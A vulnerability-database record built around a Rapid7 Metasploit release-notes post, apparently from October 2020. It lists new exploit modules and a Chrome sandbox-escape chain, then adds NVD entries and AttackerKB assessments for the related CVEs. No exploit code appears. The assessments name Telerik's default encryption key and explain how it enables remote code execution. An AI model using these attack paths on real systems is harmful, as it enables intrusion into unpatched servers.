{"id": "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "type": "rapid7blog", "bulletinFamily": "info", "title": "Metasploit Wrap-Up", "description": "\n\nMetasploit keeping that developer awareness rate up.\n\n\n\nThanks to [mr_me](<https://github.com/stevenseeley>) &amp; [wvu](<https://github.com/wvu-r7>), SharePoint is an even better target to find in your next penetration test. The newly minted module can net you a shell and a copy of the servers config, making that report oh so much more fun.\n\nLike to escape the sandbox? WizardOpium has your first taste of freedom. Brought to you by [timwr](<https://github.com/timwr>) and friends through Chrome, [this module](<https://github.com/rapid7/metasploit-framework/blob/4fb0c4ac8ab89575c4358d2369d3650bc3e1c10d/modules/exploits/multi/browser/chrome_object_create.rb>) might be that push you need to get out onti solid ground.\n\n## New modules (4)\n\n * [Login to Another User with Su on Linux / Unix Systems](<https://github.com/rapid7/metasploit-framework/pull/14179>) by [Gavin Youker](<https://github.com/youkergav>)\n * [Microsoft SharePoint Server-Side Include and ViewState RCE](<https://github.com/rapid7/metasploit-framework/pull/14265>) by [wvu](<https://github.com/wvu-r7>) and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>)\n * [Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization](<https://github.com/rapid7/metasploit-framework/pull/14229>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), [Caleb Gross](<https://github.com/noperator>), [Markus Wulftange](<https://github.com/mwulftange>), [Oleksandr Mirosh](<https://twitter.com/olekmirosh>), [Paul Taylor](<https://github.com/bao7uo>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [straightblast](<https://github.com/straightblast>), which exploits [CVE-2019-18935](<https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935?referrer=wrapup>)\n * [Microsoft Windows Uninitialized Variable Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [piotrflorczyk](<https://github.com/piotrflorczyk>), [timwr](<https://github.com/timwr>), and [unamer](<https://github.com/unamer>), which exploits [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>)\n\n## Enhancements and features\n\n * [Add version check to exchange_ecp_dlp_policy](<https://github.com/rapid7/metasploit-framework/pull/14289>) by [wvu](<https://github.com/wvu-r7>) adds extended version checks for SharePoint and Exchange servers as used by the exploit modules for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=wrapup>) and [CVE-2020-16952](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities?referrer=wrapup>).\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always docs improvement are greatly appreciated!\n * [Add tab completion for `run` command](<https://github.com/rapid7/metasploit-framework/pull/14240>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) adds tab completion for specifying inline options when using the `run` command. For example, within Metasploit's console typing `run` and then hitting the tab key twice will now show all available option names. Incomplete option names and values can also be also suggested, for example `run LHOST=` and then hitting the tab key twice will show all available LHOST values.\n * [CVE-2019-1458 chrome sandbox escape](<https://github.com/rapid7/metasploit-framework/pull/13817>) by [timwr](<https://github.com/timwr>) adds support for exploiting [CVE-2019-1458](<https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458?referrer=wrapup>), aka WizardOpium, as both a standalone LPE module, and as a sandbox escape option for the `exploit/multi/browser/chrome_object_create.rb` module that exploits [CVE-2018-17463](<https://attackerkb.com/topics/fgJVNLkV6f/cve-2018-17463?referrer=wrapup>) in Chrome, thereby allowing users to both elevate their privileges on affected versions of Windows, as well as potentially execute a full end to end attack chain to go from a malicious web page to SYSTEM on systems running vulnerable versions of Chrome and Windows.\n * [Parameterize args to popen3()](<https://github.com/rapid7/metasploit-framework/pull/14288>) by [Justin Steven](<https://github.com/justinsteven>) improves commands executed during `apk` generation commands to be more explicit with options.\n * [More improved doc and syntax](<https://github.com/rapid7/metasploit-framework/pull/14258>) by [h00die](<https://github.com/h00die>) adds documentation and code quality changes for multiple modules. As always, docs improvements are greatly appreciated!\n\n## Bugs fixed\n\n * [MS17-010 improvements for SMB1 clients](<https://github.com/rapid7/metasploit-framework/pull/14290>) by [Spencer McIntyre](<https://github.com/zeroSteiner>) fixes an issue with the exploit/windows/smb/ms17_010_eternalblue module that was preventing sessions from being obtained successfully.\n * [Fix missing TLV migration from strings -&gt; ints](<https://github.com/rapid7/metasploit-payloads/pull/441>) by [Justin Steven](<https://github.com/justinsteven>) converts a missed TLV conversion for COMMAND_ID_CORE_CHANNEL_CLOSE for PHP payloads.\n * [Meterpreter endless loop](<https://github.com/rapid7/metasploit-payloads/pull/439>) by [vixfwis](<https://github.com/vixfwis>), ensured that Meterpreter can properly handle SOCKET_ERROR on recv.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-10-13T14%3A57%3A09-05%3A00..2020-10-22T09%3A00%3A02-05%3A00%22>)\n * [Full diff 6.0.11...6.0.12](<https://github.com/rapid7/metasploit-framework/compare/6.0.11...6.0.12>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "published": "2020-10-23T18:56:55", "modified": "2020-10-23T18:56:55", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "https://blog.rapid7.com/2020/10/23/metasploit-wrap-up-84/", "reporter": "Jeffrey Martin", "references": [], "cvelist": ["CVE-2018-17463", "CVE-2019-1458", "CVE-2019-18935", "CVE-2020-16875", "CVE-2020-16952"], "lastseen": "2020-10-28T04:47:53", "viewCount": 52, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-18935", "CVE-2020-16952", "CVE-2018-17463", "CVE-2019-1458", "CVE-2020-16875"]}, {"type": "attackerkb", "idList": ["AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B"]}, {"type": "hackerone", "idList": ["H1:913695", "H1:838196"]}, {"type": "symantec", "idList": ["SMNTC-111060"]}, {"type": "securelist", "idList": ["SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "SECURELIST:4F6413DE862444B5FA0B192AF22A042D"]}, {"type": "cisa", "idList": ["CISA:48962A3B37B032DCF622B3E3135B8A1A"]}, {"type": "mscve", "idList": ["MS:CVE-2019-1458", "MS:CVE-2020-16952", "MS:CVE-2020-16875"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:159612", "PACKETSTORM:156651", "PACKETSTORM:159569", "PACKETSTORM:159210", "PACKETSTORM:156640", "PACKETSTORM:159653"]}, {"type": "threatpost", "idList": ["THREATPOST:230DF95E70EB9C4F372C198798822D19", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:8A816F536308CF8DB9594CD95292E06E", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:F0CFD85C624CF71A4056F7DCC02BD683", "THREATPOST:2EA02E029D18D4A6E2F53BF8057CCD57", "THREATPOST:7E0D83AD71F0D13E7AF6CC3E38AC5F6F", "THREATPOST:02914A68EEB34D94544D5D00BF463BAC"]}, {"type": "zdt", "idList": ["1337DAY-ID-34054", "1337DAY-ID-33683", "1337DAY-ID-34066"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B"]}, {"type": "exploitdb", "idList": ["EDB-ID:47793", "EDB-ID:48184", "EDB-ID:48180"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE/", "MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE", "MSF:EXPLOIT/WINDOWS/HTTP/TELERIK_RAU_DESERIALIZATION/", "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2019_1458_WIZARDOPIUM/"]}, {"type": "nessus", "idList": ["TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2016.NASL", "SMB_NT_MS19_DEC_4530702.NASL", "SMB_NT_MS19_DEC_4530681.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2019.NASL", "SMB_NT_MS19_DEC_4530734.NASL", "SMB_NT_MS19_DEC_4530695.NASL", "SMB_NT_MS20_OCT_OFFICE_SHAREPOINT_2013.NASL", "SMB_NT_MS20_SEP_EXCHANGE.NASL", "SMB_NT_MS19_DEC_4530691.NASL"]}, {"type": "mskb", "idList": ["KB4486676", "KB4486677", "KB4577352", "KB4486694"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:BB987E93C1A58280077D98CF497FD72D"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:69F5E155188CF28043839A251912213A", "QUALYSBLOG:9E7466695714D29E4314F63F45A74EB3", "QUALYSBLOG:D1C46696E4E69F5182E6FECCD3884846"]}, {"type": "thn", "idList": ["THN:592EF1422E531E5A7AD2804EA7E024CD", "THN:CDB4261BBCF3D5E2CC872D65E155CC0E"]}, {"type": "krebs", "idList": ["KREBS:537C1540357C1E3360A8168D22F44CB5", "KREBS:B3F20C0C41C613971FDADBAE93382CDF", "KREBS:DF8493DA16F49CE6247436830678BA8D", "KREBS:613A537780BD40A6F8E0047CE8D3E6EC"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A"]}, {"type": "myhack58", "idList": ["MYHACK58:62201996030"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A46B3136EBE92DFE53548BB20EFF1ABC", "GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814094", "OPENVAS:1361412562310814095", "OPENVAS:1361412562310704330", "OPENVAS:1361412562310814096", "OPENVAS:1361412562310851995", "OPENVAS:1361412562310815862", "OPENVAS:1361412562310815737", "OPENVAS:1361412562310815735", "OPENVAS:1361412562310851948", "OPENVAS:1361412562310815867"]}, {"type": "kaspersky", "idList": ["KLA11862"]}, {"type": "archlinux", "idList": ["ASA-201810-12"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4330-1:C6D67"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:3273-1"]}], "modified": "2020-10-28T04:47:53", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2020-10-28T04:47:53", "rev": 2}, "vulnersScore": 7.4}}

{"cve": [{"lastseen": "2020-10-22T10:49:04", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "title": "CVE-2020-16952", "type": "cve", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-21T16:07:00", "cpe": ["cpe:/a:microsoft:sharepoint_foundation:2013", "cpe:/a:microsoft:sharepoint_server:2019", "cpe:/a:microsoft:sharepoint_enterprise_server:2016"], "id": "CVE-2020-16952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:25:38", "description": "Incorrect side effect annotation in V8 in Google Chrome prior to 70.0.3538.64 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "edition": 16, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-14T15:29:00", "title": "CVE-2018-17463", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17463"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:redhat:linux_server:6.0", "cpe:/o:redhat:linux_workstation:6.0", "cpe:/o:redhat:linux_desktop:6.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2018-17463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17463", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:linux_server:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T21:41:48", "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)", "edition": 11, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-11T13:15:00", "title": "CVE-2019-18935", "type": "cve", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2020-10-20T22:15:00", "cpe": [], "id": "CVE-2019-18935", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-10-03T12:55:52", "description": "A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments.An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user, aka 'Microsoft Exchange Server Remote Code Execution Vulnerability'.", "edition": 3, "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-11T17:15:00", "title": "CVE-2020-16875", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16875"], "modified": "2020-09-17T16:15:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2020-16875", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16875", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_6:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_5:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_17:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_16:*:*:*:*:*:*"]}, {"lastseen": "2020-10-16T12:04:25", "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-10T22:15:00", "title": "CVE-2019-1458", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1458"], "modified": "2020-10-15T21:15:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2019-1458", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2020-11-18T06:36:26", "bulletinFamily": "info", "cvelist": ["CVE-2017-11317", "CVE-2017-11357", "CVE-2019-18935"], "description": "Progress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known due to the presence of CVE-2017-11317 or CVE-2017-11357, or other means. Exploitation can result in remote code execution. (As of 2020.1.114, a default setting prevents the exploit. In 2019.3.1023, but not earlier versions, a non-default setting can prevent exploitation.)\n\n \n**Recent assessments:** \n \n**zeroSteiner** at February 05, 2020 6:37pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 4**ccondon-r7** at October 13, 2020 4:47pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**gwillcox-r7** at October 20, 2020 6:59pm UTC reported:\n\nThis vulnerability originally outlined by [bishopfox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>) is a variation on CVE-2017-11317. The patch for CVE-2017-11317 introduced encryption on the object which prevents an attacker from modifying the object in such a way to achieve file upload as the original did. This mitigation, however uses a default value for the encryption key of `PrivateKeyForEncryptionOfRadAsyncUploadConfiguration` that if left unchanged can be used to encrypt an object to reproduce similar conditions to CVE-2017-11317. With the ability to upload an arbitrary file, a Mixed Mode Assembly can be uploaded to achieve RCE through the deserializeation functionality in `JavaScriptSerializer.\n\nUsers should change their encryption key (as [recommended](<https://docs.telerik.com/devtools/aspnet-ajax/controls/asyncupload/security?_ga=2.98618715.414867971.1580929998-674280231.1580929998>) by Telerik) to a strong password and restart their server to mitigate this vulnerability. At that point an attacker would have to recover that secret value to leverage this attack chain. Versions after and including R2 2017 SP1 are not configured with a default encryption key, making exploiting this dependent on recovering the key through another means.\n\nMitigation Strength set to 3/5 due to it being dependent on the strength of the password.\n", "modified": "2020-06-05T00:00:00", "published": "2019-12-11T00:00:00", "id": "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "href": "https://attackerkb.com/topics/ZA24eUeDg5/cve-2019-18935", "type": "attackerkb", "title": "CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-15T21:14:39", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-168750", "CVE-2020-17132"], "description": "A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user, aka \u2018Microsoft Exchange Server Remote Code Execution Vulnerability\u2019. **Note:** As of January 12, 2021, the patch for CVE-2020-16875 has been bypassed twice. See [CVE-2020-17132](<https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132#rapid7-analysis>) for details.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at September 09, 2020 6:14pm UTC reported:\n\nThere\u2019s more info in Rapid7\u2019s analysis [here](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?#rapid7-analysis>), but as **@tsellers-r7** and **@smcintyre-r7** pointed out privately today, need for authenticated session + exposed PowerShell endpoint + user who belongs to specific Exchange groups = less opportunity for wide-scale attacks than something like February\u2019s Exchange vuln. I\u2019m interested to see how [Steven Seeley\u2019s exploit](<https://twitter.com/steventseeley/status/1303454166820556800>) works if he releases it, though. Might be cause for quick re-evaluation.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2021-01-15T00:00:00", "published": "2020-09-11T00:00:00", "id": "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "href": "https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875", "type": "attackerkb", "title": "CVE-2020-16875", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-18T06:36:55", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka \u2018Win32k Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 19, 2020 5:31pm UTC reported:\n\nKnown as WizardOpium for its use in the WizardOpium attacks, and first written about by Kaspersky Labs. The writeup by Kaspersky Labs can be found at <https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/> which shows that this vulnerability was used in conjunction with CVE-2019-13720, which was a 0day in the Chrome browser at the time that occurred due to a race condition between two threads.\n\nIn the WizardOpium attacks, the Chrome vulnerability, aka 